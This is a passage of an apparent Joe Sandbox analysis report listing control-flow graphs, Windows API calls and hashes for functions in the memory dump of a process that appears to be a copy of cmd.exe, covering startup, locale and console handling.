                                                                                                                                                                                                                                                                                                                                                      control_flow_graph 649 ef6903-ef691d call ef71a8 652 ef691f-ef692e 649->652 653 ef6948-ef694a 652->653 654 ef6930-ef6932 652->654 657 ef694b-ef6951 653->657 655 ef693b-ef6946 Sleep 654->655 656 ef6934-ef6939 654->656 655->652 656->657 658 ef695d-ef6963 657->658 659 ef6953-ef695b _amsg_exit 657->659 661 ef6965-ef6975 call ef6a7c 658->661 662 ef6991 658->662 660 ef6997-ef699d 659->660 664 ef699f-ef69b0 _initterm 660->664 665 ef69ba-ef69bc 660->665 666 ef697a-ef697e 661->666 662->660 664->665 667 ef69be-ef69c5 665->667 668 ef69c7-ef69ce 665->668 666->660 669 ef6980-ef698c 666->669 667->668 670 ef69f3-ef6a05 call ef09b1 668->670 671 ef69d0-ef69dd call ef7000 668->671 673 ef6a6c-ef6a7b 669->673 675 ef6a0a-ef6a19 670->675 671->670 679 ef69df-ef69f1 671->679 677 ef6a1b-ef6a35 exit _XcptFilter 675->677 678 ef6a51-ef6a58 675->678 680 ef6a5a-ef6a60 _cexit 678->680 681 ef6a65 678->681 679->670 680->681 681->673
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(000003E8,00F0CA98,0000000C), ref: 00EF6940
                                                                                                                                                                                                                                                                                                                                                      • _amsg_exit.MSVCRT ref: 00EF6955
                                                                                                                                                                                                                                                                                                                                                      • _initterm.MSVCRT ref: 00EF69A9
                                                                                                                                                                                                                                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00EF69D5
                                                                                                                                                                                                                                                                                                                                                      • exit.MSVCRT ref: 00EF6A1C
                                                                                                                                                                                                                                                                                                                                                      • _XcptFilter.MSVCRT ref: 00EF6A2E
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: CurrentFilterImageNonwritableSleepXcpt_amsg_exit_inittermexit
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 796493780-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 56a281aa935c03a75eb07e56057fe9c1aff2b87066ad5a7cc46c5f8f3e7ae57f
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: e367e8b1bc96a365e5e42e2133e9b2144aa6221a93e35d2919b227222abe708b
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 56a281aa935c03a75eb07e56057fe9c1aff2b87066ad5a7cc46c5f8f3e7ae57f
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8331C57164431DCFEB259B64ED4563977A0FB89738F24292DE606F72E0EBB09840EB41
                                                                                                                                                                                                                                                                                                                                                      Function 00EEE2AF Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 34threadlibraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                                                                                      control_flow_graph 683 eee2af-eee2ba 684 eee2bc-eee2c9 SetThreadUILanguage 683->684 685 eee2ca-eee2d2 683->685 686 eee2ef-eee2f1 685->686 687 eee2d4-eee2ed GetModuleHandleW 685->687 689 eee307-eee309 686->689 690 eee2f3-eee301 GetProcAddress 686->690 687->686 687->689 689->684 691 eee30b-efdc0f SetThreadLocale 689->691 690->689
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • SetThreadUILanguage.KERNELBASE ref: 00EEE2C6
                                                                                                                                                                                                                                                                                                                                                      • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL,00000000,00EEB952), ref: 00EEE2D9
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(774B0000,SetThreadUILanguage,00000000,00EEB952), ref: 00EEE2F9
                                                                                                                                                                                                                                                                                                                                                      • SetThreadLocale.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000409,00000000,00EEB952), ref: 00EFDC08
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Thread$AddressHandleLanguageLocaleModuleProc
                                                                                                                                                                                                                                                                                                                                                      • String ID: KERNEL32.DLL$SetThreadUILanguage
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1264603166-2530943252
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: d3e795a54c3e4e2d21eead892c8e352502a5400c38497c8b684cca57cab8a170
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 659263e8c08014881811c0759fd2e2d17c209076611a4fcb8c0dc9a288b4eae8
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d3e795a54c3e4e2d21eead892c8e352502a5400c38497c8b684cca57cab8a170
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BEF0B43190126C8BC6216F35BD0D6993658EB08B34B055201FA15F33F4CBB09C42EA91
                                                                                                                                                                                                                                                                                                                                                      Function 00EEAD60 Relevance: 9.3, APIs: 6, Instructions: 328COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                                                                                      control_flow_graph 693 eead60-eeadc0 GetConsoleTitleW 694 eeadc6-eeadd8 call ef5a2e 693->694 695 efcc60 693->695 700 efcc3f 694->700 701 eeadde-eeadf1 call eee3f0 694->701 697 efcc6a-efcc73 GetLastError 695->697 699 efcc4d call ee78e4 697->699 705 efcc52 699->705 704 efcc49-efcc4b 700->704 707 eeadf7-eeadff 701->707 708 efcc55-efcc5b call ef61e6 701->708 704->699 705->708 709 eeb0b9-eeb0c3 call ef0b12 707->709 710 eeae05-eeae1d call eee950 707->710 708->695 709->704 716 eeb0c9-eeb0d6 call ee7f47 709->716 717 eeb118-eeb11f call ef21ee 710->717 718 eeae23-eeae26 710->718 716->697 726 eeb0dc-eeb0f9 towupper 716->726 734 eeb126-eeb12b call ef2940 717->734 718->708 720 eeae2c-eeae3e 718->720 723 efcc7c-efcc87 call ef61e6 720->723 724 eeae44-eeae4c 720->724 727 efcc8e 723->727 724->727 728 eeae52-eeae62 724->728 730 eeb100-eeb109 726->730 731 efcc99 727->731 728->731 732 eeae68-eeae76 728->732 730->730 735 eeb10b-eeb112 730->735 737 efcca4 731->737 736 eeae7c-eeae8b call eebc30 732->736 732->737 742 eeafc9-eeb005 call eeb17b call ef61e6 call ef6b30 734->742 735->717 740 efcc75-efcc77 call f09a7d 735->740 747 eeb006-eeb008 736->747 748 eeae91-eeae94 736->748 743 efccaf 737->743 740->723 750 efccb7-efccb9 743->750 747->748 751 eeb00e-eeb021 wcsncmp 747->751 752 eeaea9-eeaeab 748->752 753 eeae96-eeaea3 call eea800 748->753 757 efccbf-efccc4 750->757 758 eeaf2d-eeaf36 750->758 751->752 759 eeb027 751->759 754 eeaf71-eeaf7a call eeb1b0 752->754 755 eeaeb1-eeaeb5 752->755 753->708 753->752 777 eeaf7c-eeaf7e call eead26 754->777 778 eeaf83-eeaf97 754->778 761 eeaf6b 755->761 762 eeaebb-eeaebd 755->762 757->758 765 eeaf3c-eeaf3e 758->765 766 eeb130-eeb135 758->766 759->748 761->754 769 eeaec0-eeaec9 762->769 772 eeb16c-eeb170 765->772 773 eeaf44-eeaf49 765->773 766->765 768 eeb13b-eeb145 call ef0b12 766->768 790 eeb198-eeb19c 768->790 791 eeb147-eeb14e 768->791 769->769 776 eeaecb-eeaedd wcschr 769->776 772->773 780 eeb176-efccd6 772->780 774 eeaf50-eeaf59 773->774 774->774 781 eeaf5b-eeaf65 774->781 783 eeb033-eeb043 776->783 784 eeaee3-eeaee8 776->784 777->778 786 eeaf99-eeaf9f 778->786 787 eeafc4 call eeaa50 778->787 795 efccdb-efccea call ee78e4 780->795 781->755 781->761 796 eeb046-eeb04f 783->796 784->750 792 eeaeee-eeaef4 784->792 793 eeb02c-eeb031 call eec6c0 786->793 794 eeafa5-eeafab 786->794 787->742 790->795 798 eeb160-eeb167 791->798 799 eeb150-eeb15a call ee7f47 791->799 792->750 800 eeaefa-eeaf03 792->800 793->742 801 eeb098-eeb09d call ee9dc0 794->801 802 eeafb1-eeafb7 794->802 795->705 796->796 797 eeb051-eeb05b 796->797 805 eeb05d 797->805 806 eeb077-eeb07f 797->806 798->765 799->798 825 efccc9-efccd2 GetLastError 799->825 808 eeaf05-eeaf0a 800->808 801->742 810 eeafbd-eeafc2 call ee9770 802->810 811 eeb0a2-eeb0a8 802->811 814 eeb060-eeb067 805->814 815 eeb085-eeb08e 806->815 816 eeb193 call ef6c78 806->816 818 eeaf0c-eeaf13 808->818 819 eeaf20-eeaf22 808->819 810->742 811->734 821 eeb0aa-eeb0b2 call ee59a0 811->821 823 eeb069-eeb071 814->823 824 eeb072-eeb075 814->824 815->801 816->790 818->819 826 eeaf15-eeaf1e 818->826 819->743 827 eeaf28-eeaf2a 819->827 831 eeb0b4 821->831 823->824 824->806 824->814 825->795 826->808 826->819 827->758 831->742
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetConsoleTitleW.KERNELBASE(?,00000104,55099697,00000001,?), ref: 00EEADB6
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF5A2E: memset.MSVCRT ref: 00EF5A5A
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
                                                                                                                                                                                                                                                                                                                                                      • towupper.MSVCRT ref: 00EEB0E3
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE950: memset.MSVCRT ref: 00EEE9A0
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE950: wcschr.MSVCRT ref: 00EEE9FC
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE950: wcschr.MSVCRT ref: 00EEEA14
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE950: _wcsicmp.MSVCRT ref: 00EEEA80
                                                                                                                                                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 00EEAED2
                                                                                                                                                                                                                                                                                                                                                      • wcsncmp.MSVCRT ref: 00EEB016
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBCA7
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEBC30: iswspace.MSVCRT ref: 00EEBD1D
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBD39
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBD5D
                                                                                                                                                                                                                                                                                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00007FE7), ref: 00EFCC6C
                                                                                                                                                                                                                                                                                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00EFCCCB
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: wcschr$memset$ErrorLast$ConsoleTitle_wcsicmpiswspacetowupperwcsncmp
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 4198873954-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: a1e8ebb30f4993bbb34a4c2e730ef50329482f28cc8839acb8c6ee93126b3980
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: e67646bbc2cc38c5ce75eea0855be6621245ac1f3e5f5624b48084fa72a2420e
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a1e8ebb30f4993bbb34a4c2e730ef50329482f28cc8839acb8c6ee93126b3980
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ADB16E71A0029D87CB34AB26CD957BA73A1EF40304F28617DDA1EB72D1EB30AD85C756
                                                                                                                                                                                                                                                                                                                                                      Function 00EF1F1A Relevance: 7.6, APIs: 5, Instructions: 52threadCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                                                                                      control_flow_graph 862 ef1f1a-ef1f33 GetConsoleOutputCP GetCPInfo 863 ef1f39-ef1f54 memset 862->863 864 eff185-eff194 GetThreadLocale 862->864 865 ef1f5a 863->865 866 eff1d7-eff1d8 863->866 867 eff1ae-eff1b2 864->867 868 eff196-eff1a0 864->868 869 eff1dd-eff1e2 866->869 870 eff1c8 867->870 871 eff1b4-eff1b8 867->871 868->867 872 eff20b-eff20c 869->872 873 eff1e4-eff1ec 869->873 870->866 871->870 874 eff1ba 871->874 875 eff1ee-eff200 memset 873->875 876 eff203-eff209 873->876 874->870 875->876 876->869 876->872
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetConsoleOutputCP.KERNELBASE(00EF0A41), ref: 00EF1F1A
                                                                                                                                                                                                                                                                                                                                                      • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00F1C9F0), ref: 00EF1F2B
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00EF1F45
                                                                                                                                                                                                                                                                                                                                                      • GetThreadLocale.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00EFF185
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00EFF1FB
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: memset$ConsoleInfoLocaleOutputThread
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1263632223-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 481e393c15dca1fb9cd99ae249962db566c5c9b69ba862a0d02fa6061b5b67ac
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 2dcfcb17d899337e36d1001a3c7ec274269d347f227fd0926f07783088b9ff4d
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 481e393c15dca1fb9cd99ae249962db566c5c9b69ba862a0d02fa6061b5b67ac
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FB11AFB1A4931FD9D7385F24DC067F53E94AF00304F846176E6C271062D7784482B7DA
                                                                                                                                                                                                                                                                                                                                                      Function 00EEE3F0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 55COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                                                                                      control_flow_graph 884 eee3f0-eee403 885 eee45d 884->885 886 eee405-eee41d call ef6e25 884->886 888 eee45f-eee463 885->888 889 eee422-eee427 886->889 890 eee42d-eee43b 889->890 891 efdc4a-efdc66 call f034d4 889->891 892 efdc6b-efdc72 ??_V@YAXPAX@Z 890->892 893 eee441-eee44f 890->893 891->888 896 eee466-eee468 893->896 897 eee451-eee45a memset 893->897 896->897 897->885
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00EEE455
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,00EE5F21,-00000001), ref: 00EFDC6C
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                                                                                                                                                      • String ID: !_$onecore\base\cmd\maxpathawarestring.cpp
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2221118986-357547154
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: addab524dd103182d384636c225f1bffeb6d088334ab688c278e557cb332f399
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 6a0d196a0aa9afd5c2b56ad8f6c26d1de633ef5f91c31b224ef7506bf3df92e3
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: addab524dd103182d384636c225f1bffeb6d088334ab688c278e557cb332f399
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D8014CB270474CA7D7289626DC0AB77B6DACBC0310F10552EF96AF73C1DAB6EC408261
                                                                                                                                                                                                                                                                                                                                                      Function 00EF742D Relevance: 4.5, APIs: 3, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • _callnewh.MSVCRT ref: 00EF7437
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF74D1: ??0exception@@QAE@ABQBDH@Z.MSVCRT(00EF77EC,00000001), ref: 00EF74E7
                                                                                                                                                                                                                                                                                                                                                      • malloc.MSVCRT ref: 00EF7444
                                                                                                                                                                                                                                                                                                                                                      • _CxxThrowException.MSVCRT(?,00F0CBF8), ref: 00EF77F5
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: ??0exception@@ExceptionThrow_callnewhmalloc
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 813871643-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: da80e2804db4aa2d87eca9c5b8c47e7029d8f5d837447e9a175fd30ed0a901e9
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: ac33b2c72d048eeaa4f0d4c88491d9bef6018aef3a78bcc146d7bb92849a646a
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: da80e2804db4aa2d87eca9c5b8c47e7029d8f5d837447e9a175fd30ed0a901e9
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 26E0D83550810D77CF107B65EC098BE7F6D4B803207149060BFA9F6491DF30D942E5D1
                                                                                                                                                                                                                                                                                                                                                      Function 00EE5EA3 Relevance: 3.3, APIs: 2, Instructions: 292COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00EE5EFB
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE8E9E: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00F28BF0,00000000,?), ref: 00EE8EC3
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBCA7
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEBC30: iswspace.MSVCRT ref: 00EEBD1D
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBD39
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBD5D
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF0060: wcschr.MSVCRT ref: 00EF006C
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00EE5FF7
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: wcschr$memset$CurrentDirectoryiswspace
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 4234405029-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: e122f37585c286d6221e48a914f7e0462016d48248a1f24c223d66c03b72db5e
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 168b9b414abc969d8612cdf9e1518a9cf87322fe3f33f7519febc7fc601413e8
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e122f37585c286d6221e48a914f7e0462016d48248a1f24c223d66c03b72db5e
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 31A1E3716083898BD728DB21C84967FB7E5EFC0348F14982DE98AE3291EB34C841DB52
                                                                                                                                                                                                                                                                                                                                                      Function 00EEE470 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 152COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                                                                                                                                                      • String ID: COMSPEC
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2221118986-1631433037
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 93dfa3f02bf5ba28550a87f4995c702b80903100e6d5cdb1b277a4f468bc6605
